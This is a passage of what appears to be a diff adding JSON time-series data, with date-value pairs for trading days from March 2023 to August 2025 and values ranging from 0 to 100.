"2023-03-20", + 8.507021090004322 + ], + [ + "2023-03-21", + 2.6373706786720343 + ], + [ + "2023-03-22", + 5.739399709140272 + ], + [ + "2023-03-23", + 6.430348552957556 + ], + [ + "2023-03-24", + 1.6918371724394046 + ], + [ + "2023-03-27", + 2.6383904366446638 + ], + [ + "2023-03-28", + 3.2238786708027627 + ], + [ + "2023-03-29", + 4.612866729196546 + ], + [ + "2023-03-30", + 4.7333774436118485 + ], + [ + "2023-03-31", + 3.25130373163736 + ], + [ + "2023-04-03", + 3.6132410535586037 + ], + [ + "2023-04-04", + 0.9714303267170158 + ], + [ + "2023-04-05", + 3.453158116521294 + ], + [ + "2023-04-06", + 0.0 + ], + [ + "2023-04-10", + 0.0 + ], + [ + "2023-04-11", + 1.4966818613215267 + ], + [ + "2023-04-12", + 0.0 + ], + [ + "2023-04-13", + 3.444506853965178 + ], + [ + "2023-04-14", + 0.0 + ], + [ + "2023-04-17", + 0.0 + ], + [ + "2023-04-18", + 0.01420576731125796 + ], + [ + "2023-04-19", + 0.0 + ], + [ + "2023-04-20", + 0.0 + ], + [ + "2023-04-21", + 0.0 + ], + [ + "2023-04-24", + 0.017106910452649043 + ], + [ + "2023-04-25", + 4.557666770366739 + ], + [ + "2023-04-26", + 4.4541420385106365 + ], + [ + "2023-04-27", + 9.380924043521803 + ], + [ + "2023-04-28", + 8.989670764485856 + ], + [ + "2023-05-01", + 5.790022694207699 + ], + [ + "2023-05-02", + 6.742193430123419 + ], + [ + "2023-05-03", + 7.132087913440338 + ], + [ + "2023-05-04", + 5.858030272197466 + ], + [ + "2023-05-05", + 10.498206622354818 + ], + [ + "2023-05-08", + 10.521238339501094 + ], + [ + "2023-05-09", + 10.519736255131 + ], + [ + "2023-05-10", + 10.364035666983163 + ], + [ + "2023-05-11", + 6.395658253061143 + ], + [ + "2023-05-12", + 6.539579974377106 + ], + [ + "2023-05-15", + 6.753632946377411 + ], + [ + "2023-05-16", + 6.742915695859198 + ], + [ + "2023-05-17", + 8.08948152864516 + ], + [ + "2023-05-18", + 9.77404438554972 + ], + [ + "2023-05-19", + 10.122510801542736 + ], + [ + "2023-05-22", + 9.912740983024069 + ], + [ + "2023-05-23", + 6.95283381114336 + ], + [ + "2023-05-24", + 8.061465697452173 + ], + [ + "2023-05-25", + 6.302450574938781 + ], + [ + "2023-05-26", + 12.759664761451079 + ], + [ + "2023-05-30", + 12.79637513657871 + ], + [ + "2023-05-31", + 12.297054893886289 + ], + [ + "2023-06-01", + 11.365127521758374 + ], + [ + "2023-06-02", + 10.521159133773992 + ], + [ + "2023-06-05", + 7.503104518370504 + ], + [ + "2023-06-06", + 7.819079507653521 + ], + [ + "2023-06-07", + 12.697355113745317 + ], + [ + "2023-06-08", + 12.831688205935066 + ], + [ + "2023-06-09", + 12.809841753204076 + ], + [ + "2023-06-12", + 14.057426507822187 + ], + [ + "2023-06-13", + 14.129651200465984 + ], + [ + "2023-06-14", + 13.943380850120967 + ], + [ + "2023-06-15", + 13.898518015457428 + ], + [ + "2023-06-16", + 13.313434317673837 + ], + [ + "2023-06-20", + 13.199408152371511 + ], + [ + "2023-06-21", + 17.18301999554329 + ], + [ + "2023-06-22", + 14.009191243385816 + ], + [ + "2023-06-23", + 15.48257729581762 + ], + [ + "2023-06-26", + 13.522523647937307 + ], + [ + "2023-06-27", + 8.91600026233232 + ], + [ + "2023-06-28", + 8.815841534686863 + ], + [ + "2023-06-29", + 7.925536996847852 + ], + [ + "2023-06-30", + 8.918543858956147 + ], + [ + "2023-07-03", + 8.50861932957099 + ], + [ + "2023-07-05", + 8.561890380445494 + ], + [ + "2023-07-06", + 9.879192055370913 + ], + [ + "2023-07-07", + 4.819123863124619 + ], + [ + "2023-07-10", + 3.4704738838858358 + ], + [ + "2023-07-11", + 3.529824027589217 + ], + [ + "2023-07-12", + 1.5271218714309742 + ], + [ + "2023-07-13", + 4.5827282499241155 + ], + [ + "2023-07-14", + 4.222110719839158 + ], + [ + "2023-07-17", + 3.5215495671450143 + ], + [ + "2023-07-18", + 2.974369887549868 + ], + [ + "2023-07-19", + 2.8046990664953633 + ], + [ + "2023-07-20", + 9.202988009198297 + ], + [ + "2023-07-21", + 8.146838510028648 + ], + [ + "2023-07-24", + 6.1860697027041684 + ], + [ + "2023-07-25", + 2.703296425272017 + ], + [ + "2023-07-26", + 0.0 + ], + [ + "2023-07-27", + 0.34264688179541397 + ], + [ + "2023-07-28", + 4.315015417710062 + ], + [ + "2023-07-31", + 1.6164365760576938 + ], + [ + "2023-08-01", + 1.9129242539432663 + ], + [ + "2023-08-02", + 9.99633221154736 + ], + [ + "2023-08-03", + 9.08135573271539 + ], + [ + "2023-08-04", + 9.254406249736402 + ], + [ + "2023-08-07", + 10.047361848596555 + ], + [ + "2023-08-08", + 11.058770274786909 + ], + [ + "2023-08-09", + 10.524553885193336 + ], + [ + "2023-08-10", + 5.9124361513527495 + ], + [ + "2023-08-11", + 6.273855307194248 + ], + [ + "2023-08-14", + 6.954277889628428 + ], + [ + "2023-08-15", + 6.361767344139109 + ], + [ + "2023-08-16", + 7.248489043548638 + ], + [ + "2023-08-17", + 1.649185277782807 + ], + [ + "2023-08-18", + 1.66409535663095 + ], + [ + "2023-08-21", + 6.836841969876109 + ], + [ + "2023-08-22", + 5.67186599962203 + ], + [ + "2023-08-23", + 10.202722515524714 + ], + [ + "2023-08-24", + 15.864607520946441 + ], + [ + "2023-08-25", + 11.579313587443476 + ], + [ + "2023-08-28", + 12.835589017313445 + ], + [ + "2023-08-29", + 19.820220040917793 + ], + [ + "2023-08-30", + 14.37431029607482 + ], + [ + "2023-08-31", + 14.372092557360306 + ], + [ + "2023-09-01", + 14.04651243569407 + ], + [ + "2023-09-05", + 13.210439666538734 + ], + [ + "2023-09-06", + 13.27618902259386 + ], + [ + "2023-09-07", + 12.252849683279662 + ], + [ + "2023-09-08", + 12.240924032239384 + ], + [ + "2023-09-11", + 12.978369939885217 + ], + [ + "2023-09-12", + 13.321782483574578 + ], + [ + "2023-09-13", + 11.792361407612825 + ], + [ + "2023-09-14", + 10.162841817883074 + ], + [ + "2023-09-15", + 12.798766884017557 + ], + [ + "2023-09-18", + 12.669018409631022 + ], + [ + "2023-09-19", + 9.650863240583114 + ], + [ + "2023-09-20", + 12.768223474349435 + ], + [ + "2023-09-21", + 13.630035406891535 + ], + [ + "2023-09-22", + 7.345903051306406 + ], + [ + "2023-09-25", + 6.62513200894948 + ], + [ + "2023-09-26", + 8.305782887964911 + ], + [ + "2023-09-27", + 0.0 + ], + [ + "2023-09-28", + 0.8260400952817583 + ], + [ + "2023-09-29", + 0.4703657553272126 + ], + [ + "2023-10-02", + 2.301129599123711 + ], + [ + "2023-10-03", + 5.682874606791928 + ], + [ + "2023-10-04", + 9.084101099339712 + ], + [ + "2023-10-05", + 8.706042592849524 + ], + [ + "2023-10-06", + 13.409226569504357 + ], + [ + "2023-10-09", + 11.71149497241464 + ], + [ + "2023-10-10", + 10.98776042221285 + ], + [ + "2023-10-11", + 11.610226774484552 + ], + [ + "2023-10-12", + 10.70806075810124 + ], + [ + "2023-10-13", + 8.871503698844888 + ], + [ + "2023-10-16", + 10.869774777578952 + ], + [ + "2023-10-17", + 10.947615673717232 + ], + [ + "2023-10-18", + 10.80570984466391 + ], + [ + "2023-10-19", + 6.637951816958712 + ], + [ + "2023-10-20", + 9.937715393611763 + ], + [ + "2023-10-23", + 9.754507829962387 + ], + [ + "2023-10-24", + 7.814186433723866 + ], + [ + "2023-10-25", + 16.10181375115477 + ], + [ + "2023-10-26", + 19.116209948752346 + ], + [ + "2023-10-27", + 19.600258040671672 + ], + [ + "2023-10-30", + 20.38731450949615 + ], + [ + "2023-10-31", + 17.43587620558323 + ], + [ + "2023-11-01", + 18.93947179314039 + ], + [ + "2023-11-02", + 22.639540037389143 + ], + [ + "2023-11-03", + 20.944305037505544 + ], + [ + "2023-11-06", + 20.834264070167137 + ], + [ + "2023-11-07", + 21.516830774714272 + ], + [ + "2023-11-08", + 20.950033114195172 + ], + [ + "2023-11-09", + 21.538152807867768 + ], + [ + "2023-11-10", + 24.882923736286287 + ], + [ + "2023-11-13", + 25.35242101501379 + ], + [ + "2023-11-14", + 30.36704400847058 + ], + [ + "2023-11-15", + 26.95479782582817 + ], + [ + "2023-11-16", + 25.174949429516296 + ], + [ + "2023-11-17", + 20.67809838877571 + ], + [ + "2023-11-20", + 21.970313817412134 + ], + [ + "2023-11-21", + 23.06270903112712 + ], + [ + "2023-11-22", + 10.48838036823478 + ], + [ + "2023-11-24", + 0.22739844439555648 + ], + [ + "2023-11-27", + 1.134222406478149 + ], + [ + "2023-11-28", + 0.8082487086195494 + ], + [ + "2023-11-29", + 1.6092801971890975 + ], + [ + "2023-11-30", + 0.0 + ], + [ + "2023-12-01", + 0.0 + ], + [ + "2023-12-04", + 1.5914739964046551 + ], + [ + "2023-12-05", + 1.5434744285648012 + ], + [ + "2023-12-06", + 1.6477039340767423 + ], + [ + "2023-12-07", + 4.641137123559115 + ], + [ + "2023-12-08", + 2.603013601894213 + ], + [ + "2023-12-11", + 0.0 + ], + [ + "2023-12-12", + 0.1266621257813276 + ], + [ + "2023-12-13", + 0.0 + ], + [ + "2023-12-14", + 0.22321595453350956 + ], + [ + "2023-12-15", + 0.24235550074641907 + ], + [ + "2023-12-18", + 0.846187972511654 + ], + [ + "2023-12-19", + 0.0 + ], + [ + "2023-12-20", + 8.066798606621477 + ], + [ + "2023-12-21", + 10.71657831960323 + ], + [ + "2023-12-22", + 10.237778790292554 + ], + [ + "2023-12-26", + 10.259547745143449 + ], + [ + "2023-12-27", + 10.286987965851816 + ], + [ + "2023-12-28", + 10.198798765109569 + ], + [ + "2023-12-29", + 11.078464215682919 + ], + [ + "2024-01-02", + 22.126551809933055 + ], + [ + "2024-01-03", + 22.90055987552564 + ], + [ + "2024-01-04", + 24.203448062028563 + ], + [ + "2024-01-05", + 22.73660076442706 + ], + [ + "2024-01-08", + 27.8996174817437 + ], + [ + "2024-01-09", + 27.771172231203018 + ], + [ + "2024-01-10", + 27.179115927008567 + ], + [ + "2024-01-11", + 26.0035062462364 + ], + [ + "2024-01-12", + 22.808863655668624 + ], + [ + "2024-01-16", + 22.787247916849275 + ], + [ + "2024-01-17", + 23.546214206826306 + ], + [ + "2024-01-18", + 27.62536405679886 + ], + [ + "2024-01-19", + 35.7145411134388 + ], + [ + "2024-01-22", + 28.822655101164457 + ], + [ + "2024-01-23", + 26.728207467264713 + ], + [ + "2024-01-24", + 27.066544331595228 + ], + [ + "2024-01-25", + 26.60710207007378 + ], + [ + "2024-01-26", + 28.17634312491748 + ], + [ + "2024-01-29", + 29.781611832922977 + ], + [ + "2024-01-30", + 30.571945379449545 + ], + [ + "2024-01-31", + 33.308340391734546 + ], + [ + "2024-02-01", + 31.463492863882674 + ], + [ + "2024-02-02", + 34.01733518588174 + ], + [ + "2024-02-05", + 34.596627622898964 + ], + [ + "2024-02-06", + 27.97009348593369 + ], + [ + "2024-02-07", + 29.298850814271887 + ], + [ + "2024-02-08", + 28.998061580141872 + ], + [ + "2024-02-09", + 30.167134257297135 + ], + [ + "2024-02-12", + 31.235672834971815 + ], + [ + "2024-02-13", + 39.243329054088655 + ], + [ + "2024-02-14", + 39.11739704604498 + ], + [ + "2024-02-15", + 35.91786862244386 + ], + [ + "2024-02-16", + 31.166838663019675 + ], + [ + "2024-02-20", + 33.62855061326461 + ], + [ + "2024-02-21", + 33.805782881190346 + ], + [ + "2024-02-22", + 51.58997007803401 + ], + [ + "2024-02-23", + 51.96948773720376 + ], + [ + "2024-02-26", + 51.19589699257694 + ], + [ + "2024-02-27", + 49.90772981595201 + ], + [ + "2024-02-28", + 52.723270690856204 + ], + [ + "2024-02-29", + 43.639034652291805 + ], + [ + "2024-03-01", + 49.39613103791973 + ], + [ + "2024-03-04", + 47.925361398963915 + ], + [ + "2024-03-05", + 58.71118173805351 + ], + [ + "2024-03-06", + 59.25042673546557 + ], + [ + "2024-03-07", + 62.389576986205306 + ], + [ + "2024-03-08", + 69.15166095083609 + ], + [ + "2024-03-11", + 67.15317808798676 + ], + [ + "2024-03-12", + 71.77269482822466 + ], + [ + "2024-03-13", + 66.1953980649694 + ], + [ + "2024-03-14", + 63.951756770065636 + ], + [ + "2024-03-15", + 68.01288152625618 + ], + [ + "2024-03-18", + 73.46968000877536 + ], + [ + "2024-03-19", + 71.98586874922606 + ], + [ + "2024-03-20", + 74.08799646498758 + ], + [ + "2024-03-21", + 49.97512373688821 + ], + [ + "2024-03-22", + 49.41541629808898 + ], + [ + "2024-03-25", + 50.02029495764074 + ], + [ + "2024-03-26", + 50.48540096587233 + ], + [ + "2024-03-27", + 49.27033109903871 + ], + [ + "2024-03-28", + 47.67278481918184 + ], + [ + "2024-04-01", + 39.26079192403268 + ], + [ + "2024-04-02", + 41.619646738131735 + ], + [ + "2024-04-03", + 28.85886244978676 + ], + [ + "2024-04-04", + 37.51216890615053 + ], + [ + "2024-04-05", + 34.084225222057974 + ], + [ + "2024-04-08", + 25.443510175683805 + ], + [ + "2024-04-09", + 25.11740187016427 + ], + [ + "2024-04-10", + 19.314703753645407 + ], + [ + "2024-04-11", + 27.77984116976263 + ], + [ + "2024-04-12", + 38.2630374558883 + ], + [ + "2024-04-15", + 43.221338549270364 + ], + [ + "2024-04-16", + 39.39875577643732 + ], + [ + "2024-04-17", + 43.63876375561881 + ], + [ + "2024-04-18", + 36.82325991505572 + ], + [ + "2024-04-19", + 46.421638380179225 + ], + [ + "2024-04-22", + 52.03217057870969 + ], + [ + "2024-04-23", + 62.55037574862895 + ], + [ + "2024-04-24", + 63.49205801751706 + ], + [ + "2024-04-25", + 62.92622133240038 + ], + [ + "2024-04-26", + 72.35018533105584 + ], + [ + "2024-04-29", + 72.88150807218793 + ], + [ + "2024-04-30", + 80.19672591970836 + ], + [ + "2024-05-01", + 80.3326417117734 + ], + [ + "2024-05-02", + 80.4843427579351 + ], + [ + "2024-05-03", + 88.08798243614852 + ], + [ + "2024-05-06", + 91.56996796941101 + ], + [ + "2024-05-07", + 91.2080285322381 + ], + [ + "2024-05-08", + 89.18748163760198 + ], + [ + "2024-05-09", + 82.25416344637388 + ], + [ + "2024-05-10", + 75.01115659870969 + ], + [ + "2024-05-13", + 65.62299865638782 + ], + [ + "2024-05-14", + 66.2894291164387 + ], + [ + "2024-05-15", + 64.94463966786292 + ], + [ + "2024-05-16", + 63.17417156905891 + ], + [ + "2024-05-17", + 43.341824376842006 + ], + [ + "2024-05-20", + 42.45099871400618 + ], + [ + "2024-05-21", + 37.79826213875244 + ], + [ + "2024-05-22", + 38.27204063779479 + ], + [ + "2024-05-23", + 38.025087608511605 + ], + [ + "2024-05-24", + 33.5870863972078 + ], + [ + "2024-05-28", + 33.56068597688909 + ], + [ + "2024-05-29", + 16.260587790377425 + ], + [ + "2024-05-30", + 20.353062097362866 + ], + [ + "2024-05-31", + 16.790076756719404 + ], + [ + "2024-06-03", + 0.6526906829574414 + ], + [ + "2024-06-04", + 0.0 + ], + [ + "2024-06-05", + 17.18150118886006 + ], + [ + "2024-06-06", + 17.11689153951762 + ], + [ + "2024-06-07", + 17.717562309790146 + ], + [ + "2024-06-10", + 17.785626288806565 + ], + [ + "2024-06-11", + 18.692904346103425 + ], + [ + "2024-06-12", + 23.05860312748247 + ], + [ + "2024-06-13", + 15.927116312571805 + ], + [ + "2024-06-14", + 15.121157480416736 + ], + [ + "2024-06-17", + 18.274821385429725 + ], + [ + "2024-06-18", + 18.099089745919294 + ], + [ + "2024-06-20", + 23.253383091498304 + ], + [ + "2024-06-21", + 24.3042747516091 + ], + [ + "2024-06-24", + 29.93523552097757 + ], + [ + "2024-06-25", + 31.125955181927495 + ], + [ + "2024-06-26", + 31.043178608617694 + ], + [ + "2024-06-27", + 27.38815579904038 + ], + [ + "2024-06-28", + 22.250665930152635 + ], + [ + "2024-07-01", + 21.98792590507914 + ], + [ + "2024-07-02", + 24.075740375451264 + ], + [ + "2024-07-03", + 24.902175968638495 + ], + [ + "2024-07-05", + 14.221746086368398 + ], + [ + "2024-07-08", + 13.585380701611333 + ], + [ + "2024-07-09", + 12.851590352907133 + ], + [ + "2024-07-10", + 15.069695880873166 + ], + [ + "2024-07-11", + 41.06061617499721 + ], + [ + "2024-07-12", + 36.93521908932189 + ], + [ + "2024-07-15", + 36.51460384143304 + ], + [ + "2024-07-16", + 36.256191459618584 + ], + [ + "2024-07-17", + 62.94651072226502 + ], + [ + "2024-07-18", + 63.56254506989081 + ], + [ + "2024-07-19", + 64.13855394268828 + ], + [ + "2024-07-22", + 70.52318814546707 + ], + [ + "2024-07-23", + 66.90845550738965 + ], + [ + "2024-07-24", + 97.34718141860517 + ], + [ + "2024-07-25", + 98.91991768033259 + ], + [ + "2024-07-26", + 100.0 + ], + [ + "2024-07-29", + 100.0 + ], + [ + "2024-07-30", + 100.0 + ], + [ + "2024-07-31", + 100.0 + ], + [ + "2024-08-01", + 100.0 + ], + [ + "2024-08-02", + 100.0 + ], + [ + "2024-08-05", + 100.0 + ], + [ + "2024-08-06", + 100.0 + ], + [ + "2024-08-07", + 96.26792755205457 + ], + [ + "2024-08-08", + 100.0 + ], + [ + "2024-08-09", + 99.80896940669047 + ], + [ + "2024-08-12", + 99.77491314405972 + ], + [ + "2024-08-13", + 100.0 + ], + [ + "2024-08-14", + 93.07888441311003 + ], + [ + "2024-08-15", + 99.88902616233827 + ], + [ + "2024-08-16", + 99.15328625389522 + ], + [ + "2024-08-19", + 98.7127773221879 + ], + [ + "2024-08-20", + 98.62961573238135 + ], + [ + "2024-08-21", + 84.64443619039987 + ], + [ + "2024-08-22", + 86.2890169056507 + ], + [ + "2024-08-23", + 86.45716401216906 + ], + [ + "2024-08-26", + 87.81856980091918 + ], + [ + "2024-08-27", + 85.34363349022715 + ], + [ + "2024-08-28", + 78.17546624424054 + ], + [ + "2024-08-29", + 71.0593012035316 + ], + [ + "2024-08-30", + 63.37805802815419 + ], + [ + "2024-09-03", + 64.53828229209005 + ], + [ + "2024-09-04", + 64.47971005010899 + ], + [ + "2024-09-05", + 62.178401348498454 + ], + [ + "2024-09-06", + 61.68205116627134 + ], + [ + "2024-09-09", + 63.413262495061396 + ], + [ + "2024-09-10", + 64.30482432256858 + ], + [ + "2024-09-11", + 62.56065399468481 + ], + [ + "2024-09-12", + 63.64610348101066 + ], + [ + "2024-09-13", + 55.599965001734795 + ], + [ + "2024-09-16", + 55.84903934834402 + ], + [ + "2024-09-17", + 53.229828036901836 + ], + [ + "2024-09-18", + 53.38015264942081 + ], + [ + "2024-09-19", + 62.21949357379943 + ], + [ + "2024-09-20", + 58.67569384386504 + ], + [ + "2024-09-23", + 57.34552747944577 + ], + [ + "2024-09-24", + 56.04324504796223 + ], + [ + "2024-09-25", + 55.99551836072659 + ], + [ + "2024-09-26", + 54.14964862825171 + ], + [ + "2024-09-27", + 54.78170637532014 + ], + [ + "2024-09-30", + 53.37914458567781 + ], + [ + "2024-10-01", + 41.25512200310709 + ], + [ + "2024-10-02", + 40.8544834098622 + ], + [ + "2024-10-03", + 40.98047424594628 + ], + [ + "2024-10-04", + 25.522806528478963 + ], + [ + "2024-10-07", + 28.16639341332995 + ], + [ + "2024-10-08", + 30.03510302807205 + ], + [ + "2024-10-09", + 23.722005971453076 + ], + [ + "2024-10-10", + 22.733213246650763 + ], + [ + "2024-10-11", + 22.624432698195783 + ], + [ + "2024-10-14", + 22.572416832688365 + ], + [ + "2024-10-15", + 27.446978416702922 + ], + [ + "2024-10-16", + 26.745672873894634 + ], + [ + "2024-10-17", + 14.038454010310442 + ], + [ + "2024-10-18", + 14.404663849467353 + ], + [ + "2024-10-21", + 14.373167135724765 + ], + [ + "2024-10-22", + 14.03834179164516 + ], + [ + "2024-10-23", + 20.06385883636327 + ], + [ + "2024-10-24", + 20.351573684412376 + ], + [ + "2024-10-25", + 20.088529642193485 + ], + [ + "2024-10-28", + 20.009389760926105 + ], + [ + "2024-10-29", + 16.028505261474024 + ], + [ + "2024-10-30", + 17.944729115923323 + ], + [ + "2024-10-31", + 32.10334738665585 + ], + [ + "2024-11-01", + 30.440005628057236 + ], + [ + "2024-11-04", + 28.242293142011516 + ], + [ + "2024-11-05", + 27.284241713545654 + ], + [ + "2024-11-06", + 39.17270909578387 + ], + [ + "2024-11-07", + 42.354545680974915 + ], + [ + "2024-11-08", + 42.356344943361066 + ], + [ + "2024-11-11", + 41.69162716512463 + ], + [ + "2024-11-12", + 38.02888925359392 + ], + [ + "2024-11-13", + 38.15771137000393 + ], + [ + "2024-11-14", + 39.50794660490203 + ], + [ + "2024-11-15", + 49.17132909842344 + ], + [ + "2024-11-18", + 49.77007107851455 + ], + [ + "2024-11-19", + 50.33982195775302 + ], + [ + "2024-11-20", + 46.19952782487441 + ], + [ + "2024-11-21", + 45.56470407013197 + ], + [ + "2024-11-22", + 45.236469323042805 + ], + [ + "2024-11-25", + 45.23345054207773 + ], + [ + "2024-11-26", + 44.4198803877006 + ], + [ + "2024-11-27", + 44.59714978664716 + ], + [ + "2024-11-29", + 32.827018552092184 + ], + [ + "2024-12-02", + 33.701114589356116 + ], + [ + "2024-12-03", + 33.0514883554178 + ], + [ + "2024-12-04", + 32.88007457834739 + ], + [ + "2024-12-05", + 20.86569322047503 + ], + [ + "2024-12-06", + 17.394687385495594 + ], + [ + "2024-12-09", + 19.14593215685776 + ], + [ + "2024-12-10", + 19.519560621798217 + ], + [ + "2024-12-11", + 25.455621972497184 + ], + [ + "2024-12-12", + 26.600504047787005 + ], + [ + "2024-12-13", + 25.694131672280783 + ], + [ + "2024-12-16", + 11.959017134013921 + ], + [ + "2024-12-17", + 13.385839874584846 + ], + [ + "2024-12-18", + 42.31140284823541 + ], + [ + "2024-12-19", + 42.829512665407265 + ], + [ + "2024-12-20", + 43.678684925794165 + ], + [ + "2024-12-23", + 44.66773105871296 + ], + [ + "2024-12-24", + 46.68966316123663 + ], + [ + "2024-12-26", + 46.66483130645497 + ], + [ + "2024-12-27", + 48.8161002554924 + ], + [ + "2024-12-30", + 51.17263971713718 + ], + [ + "2024-12-31", + 50.61908513600938 + ], + [ + "2025-01-02", + 50.47495760470028 + ], + [ + "2025-01-03", + 52.133908354220324 + ], + [ + "2025-01-06", + 53.95849505057678 + ], + [ + "2025-01-07", + 57.18442399122482 + ], + [ + "2025-01-08", + 56.532501355562516 + ], + [ + "2025-01-10", + 59.525923247808386 + ], + [ + "2025-01-13", + 54.14098243956964 + ], + [ + "2025-01-14", + 53.878750729591815 + ], + [ + "2025-01-15", + 60.98317128800461 + ], + [ + "2025-01-16", + 57.65123382878511 + ], + [ + "2025-01-17", + 62.129251797619254 + ], + [ + "2025-01-21", + 43.958410398745215 + ], + [ + "2025-01-22", + 45.618190910809666 + ], + [ + "2025-01-23", + 44.798205197669525 + ], + [ + "2025-01-24", + 44.43756782785153 + ], + [ + "2025-01-27", + 54.09563211397891 + ], + [ + "2025-01-28", + 57.72190249769198 + ], + [ + "2025-01-29", + 55.36362233553647 + ], + [ + "2025-01-30", + 52.92954008873257 + ], + [ + "2025-01-31", + 51.68836048191887 + ], + [ + "2025-02-03", + 52.72647854343274 + ], + [ + "2025-02-04", + 51.180578343490765 + ], + [ + "2025-02-05", + 49.58554867712922 + ], + [ + "2025-02-06", + 44.430700749126764 + ], + [ + "2025-02-07", + 47.3791238385072 + ], + [ + "2025-02-10", + 44.39246200016589 + ], + [ + "2025-02-11", + 44.21692747257379 + ], + [ + "2025-02-12", + 44.07502186481972 + ], + [ + "2025-02-13", + 39.470879042676394 + ], + [ + "2025-02-14", + 38.197169336882936 + ], + [ + "2025-02-18", + 34.43913658567838 + ], + [ + "2025-02-19", + 34.16456119045294 + ], + [ + "2025-02-20", + 31.90120343893743 + ], + [ + "2025-02-21", + 39.51509252463789 + ], + [ + "2025-02-24", + 41.16035653679273 + ], + [ + "2025-02-25", + 28.987181336600422 + ], + [ + "2025-02-26", + 24.379284578154376 + ], + [ + "2025-02-27", + 37.48781431169877 + ], + [ + "2025-02-28", + 41.849636790008276 + ], + [ + "2025-03-03", + 47.93315604454308 + ], + [ + "2025-03-04", + 47.46447065399046 + ], + [ + "2025-03-05", + 47.871971606803015 + ], + [ + "2025-03-06", + 55.98897024927181 + ], + [ + "2025-03-07", + 56.5194641952996 + ], + [ + "2025-03-10", + 70.12248949100636 + ], + [ + "2025-03-11", + 66.45972846976981 + ], + [ + "2025-03-12", + 69.91238974387105 + ], + [ + "2025-03-13", + 71.39670995903829 + ], + [ + "2025-03-14", + 77.04717031220433 + ], + [ + "2025-03-17", + 77.6825699136335 + ], + [ + "2025-03-18", + 78.31316649193323 + ], + [ + "2025-03-19", + 81.99881309736493 + ], + [ + "2025-03-20", + 82.0266784986494 + ], + [ + "2025-03-21", + 79.99647937219552 + ], + [ + "2025-03-24", + 86.07858069215082 + ], + [ + "2025-03-25", + 85.67327191296289 + ], + [ + "2025-03-26", + 88.23235799760657 + ], + [ + "2025-03-27", + 81.38602718342341 + ], + [ + "2025-03-28", + 83.93152748330941 + ], + [ + "2025-03-31", + 80.37876051497062 + ], + [ + "2025-04-01", + 81.55559037687364 + ], + [ + "2025-04-02", + 79.97229083482047 + ], + [ + "2025-04-03", + 100.0 + ], + [ + "2025-04-04", + 100.0 + ], + [ + "2025-04-07", + 93.87346083359478 + ], + [ + "2025-04-08", + 95.0474608796798 + ], + [ + "2025-04-09", + 100.0 + ], + [ + "2025-04-10", + 100.0 + ], + [ + "2025-04-11", + 99.35323200891163 + ], + [ + "2025-04-14", + 99.37595051337541 + ], + [ + "2025-04-15", + 98.85955730834473 + ], + [ + "2025-04-16", + 100.0 + ], + [ + "2025-04-17", + 100.0 + ], + [ + "2025-04-21", + 100.0 + ], + [ + "2025-04-22", + 100.0 + ], + [ + "2025-04-23", + 100.0 + ], + [ + "2025-04-24", + 100.0 + ], + [ + "2025-04-25", + 100.0 + ], + [ + "2025-04-28", + 98.44854755457045 + ], + [ + "2025-04-29", + 98.51211185880382 + ], + [ + "2025-04-30", + 98.41494342906763 + ], + [ + "2025-05-01", + 98.56674602066833 + ], + [ + "2025-05-02", + 91.80285420865182 + ], + [ + "2025-05-05", + 81.2121110483752 + ], + [ + "2025-05-06", + 81.82110537798019 + ], + [ + "2025-05-07", + 80.07584030505933 + ], + [ + "2025-05-08", + 38.32384801253216 + ], + [ + "2025-05-09", + 28.579795562640776 + ], + [ + "2025-05-12", + 34.24256373986585 + ], + [ + "2025-05-13", + 34.67660005678633 + ], + [ + "2025-05-14", + 34.563666021986116 + ], + [ + "2025-05-15", + 27.5446880645106 + ], + [ + "2025-05-16", + 27.182362242205365 + ], + [ + "2025-05-19", + 20.891942815565745 + ], + [ + "2025-05-20", + 19.947789086311403 + ], + [ + "2025-05-21", + 21.295757373056276 + ], + [ + "2025-05-22", + 17.761486122766883 + ], + [ + "2025-05-23", + 18.784544288712272 + ], + [ + "2025-05-27", + 21.08357974510084 + ], + [ + "2025-05-28", + 21.571685571532278 + ], + [ + "2025-05-29", + 21.5006486268488 + ], + [ + "2025-05-30", + 21.361258127433725 + ], + [ + "2025-06-02", + 20.50896506703283 + ], + [ + "2025-06-03", + 20.023221181868507 + ], + [ + "2025-06-04", + 18.734246542202825 + ], + [ + "2025-06-05", + 19.741232119413823 + ], + [ + "2025-06-06", + 17.089296663401097 + ], + [ + "2025-06-09", + 16.970081267985616 + ], + [ + "2025-06-10", + 5.661429185400939 + ], + [ + "2025-06-11", + 4.132552341324916 + ], + [ + "2025-06-12", + 3.924878731184758 + ], + [ + "2025-06-13", + 5.821337378977385 + ], + [ + "2025-06-16", + 7.290102165934383 + ], + [ + "2025-06-17", + 8.348137267034506 + ], + [ + "2025-06-18", + 8.20341387699861 + ], + [ + "2025-06-20", + 6.419813098114356 + ], + [ + "2025-06-23", + 7.189605093133182 + ], + [ + "2025-06-24", + 7.44582957273453 + ], + [ + "2025-06-25", + 3.006873580808848 + ], + [ + "2025-06-26", + 3.088875246511584 + ], + [ + "2025-06-27", + 3.0857324431223567 + ], + [ + "2025-06-30", + 3.0097196024386887 + ], + [ + "2025-07-01", + 4.055256289249862 + ], + [ + "2025-07-02", + 3.9322946380942554 + ], + [ + "2025-07-03", + 4.456775077216861 + ], + [ + "2025-07-07", + 4.386526218466513 + ], + [ + "2025-07-08", + 3.8584706283528845 + ], + [ + "2025-07-09", + 4.0953898801072075 + ], + [ + "2025-07-10", + 4.032790263611197 + ], + [ + "2025-07-11", + 3.395679154049299 + ], + [ + "2025-07-14", + 1.9536677678171033 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.06941873540476233 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.16988328213201845 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 0.3845908752060011 + ], + [ + "2025-08-01", + 5.3980926399974525 + ], + [ + "2025-08-04", + 8.493212029981324 + ], + [ + "2025-08-05", + 9.135865421703642 + ], + [ + "2025-08-06", + 10.170203335211072 + ], + [ + "2025-08-07", + 10.162923351145109 + ], + [ + "2025-08-08", + 10.58714770475099 + ], + [ + "2025-08-11", + 10.745086032752663 + ], + [ + "2025-08-12", + 11.838414727061085 + ], + [ + "2025-08-13", + 11.848771840640827 + ], + [ + "2025-08-14", + 11.563939185715544 + ], + [ + "2025-08-15", + 11.859185873740165 + ], + [ + "2025-08-18", + 11.738577239214196 + 